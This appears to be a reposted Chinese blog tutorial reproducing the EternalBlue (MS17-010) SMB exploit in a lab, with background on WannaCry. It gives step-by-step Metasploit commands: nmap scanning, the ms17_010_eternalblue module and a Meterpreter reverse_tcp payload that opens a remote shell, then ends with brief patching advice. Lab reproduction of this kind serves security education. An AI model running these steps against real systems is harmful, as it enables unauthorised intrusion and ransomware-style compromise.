永恒之蓝漏洞复现(CVE-2017-0146)

前言

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

原理分析:

利用ms17-010中的扫描模块和攻击模块进行,首先通过扫描模块判断是否存在永恒之蓝漏洞,然后再通过攻击模块进行攻击。


提示:以下是本篇文章正文内容,下面案例可供参考

一、前期准备

1.虚拟机中安装kali系统 。(主机ip为192.168.85.131

2.装有Windows sever 2008 r2 。(目标机ip为192.168.132

3.确定已经目标机开启了445端口。

二、详细步骤

1.扫描模块

a.通过nmap -Pn  192.168.85.132扫描目标机是否开启445端口。

永恒之蓝漏洞复现(CVE-2017-0146)_第1张图片

 b.确认开启后,输入use auxiliary/scanner/smb/smb_version进入扫描模式,然后show options

永恒之蓝漏洞复现(CVE-2017-0146)_第2张图片

c.现在看到Required,有yes的就是需要自己设置。 

 

d.RHOSTS代表目标机,输入set RHOSTS 192.168.85.132,然后再show options 看是否设置好。 

永恒之蓝漏洞复现(CVE-2017-0146)_第3张图片

e.输入run,进行扫描,看是否存在永恒之蓝漏洞。(如下显示表明主机容易受到攻击)

 2.攻击模块

a.输入use exploit/windows/smb/ms17_010_eternalblue开启攻击模块。(特别注意前面的已经改变,上面是auxiliary扫描模块,下面是exploit攻击模块)

b.然后show options查看里面的设置,有yes的地方代表需要我们设置。

永恒之蓝漏洞复现(CVE-2017-0146)_第4张图片

 c.仔细观察,上面存在两个模块:

Module options (exploit/windows/smb/ms17_010_eternalblue)

Payload options (windows/x64/meterpreter/reverse_tcp)

d.我们需要对上面的RHOSTS进行设置,设置为目标机的ip192.168.85.132,然后再通过弄

use windows/x64/meterpreter/reverse_tcp 转换到第二模块进行修改LHOST主机ip与LPORT端口,不要与本机端口端口冲突。然后show options 查看结果。

永恒之蓝漏洞复现(CVE-2017-0146)_第5张图片

e.最后通过use exploit/windows/smb/ms17_010_eternalblue将payload转换为exploit攻击模块 。最后输入exploit进行攻击。

永恒之蓝漏洞复现(CVE-2017-0146)_第6张图片

 f.出现meterpreter证明你已经成功实习永恒之蓝漏洞了。输入sysinfo查看目标主机信息。

永恒之蓝漏洞复现(CVE-2017-0146)_第7张图片

3.补充知识

a.进入攻击模块后输入info可查看这个漏洞信息。

 永恒之蓝漏洞复现(CVE-2017-0146)_第8张图片

 b.输入show targets查看可攻击的系统平台。

永恒之蓝漏洞复现(CVE-2017-0146)_第9张图片

预防永恒之蓝漏洞

1、更新最新的系统补丁

2、使用云服务备份数据

3、屏蔽端口

你可能感兴趣的:(漏洞复现篇,安全)